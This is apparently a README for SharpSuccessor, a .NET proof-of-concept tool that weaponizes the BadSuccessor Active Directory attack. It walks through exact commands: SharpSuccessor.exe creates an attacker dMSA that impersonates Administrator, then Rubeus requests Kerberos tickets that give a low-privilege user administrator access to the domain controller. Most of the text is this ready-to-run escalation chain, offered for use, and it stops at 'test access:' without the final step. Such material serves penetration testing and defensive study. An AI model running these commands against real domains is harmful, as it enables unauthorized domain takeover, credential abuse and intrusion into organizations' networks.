SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. A low privilege user with CreateChild permissions over any Organizational Unit (OU) in the Active Directory domain can escalate privileges to domain administrator.
Use SharpSuccessor to add and weaponize the dMSA object, setting the account with access to the current user context:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
Request a TGT as the current user context, in this case jdoe:
Rubeus.exe tgtdeleg /nowrap
Then use that tgt to impersonate the dM 6BF7 SA account:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....
Now you can request a service ticket with Administrator context for any SPN, including the Domain Controllers for post-exploitation. For example here I will show admin privileges for SMB on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that we have the ticket in memory, we can test access:
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!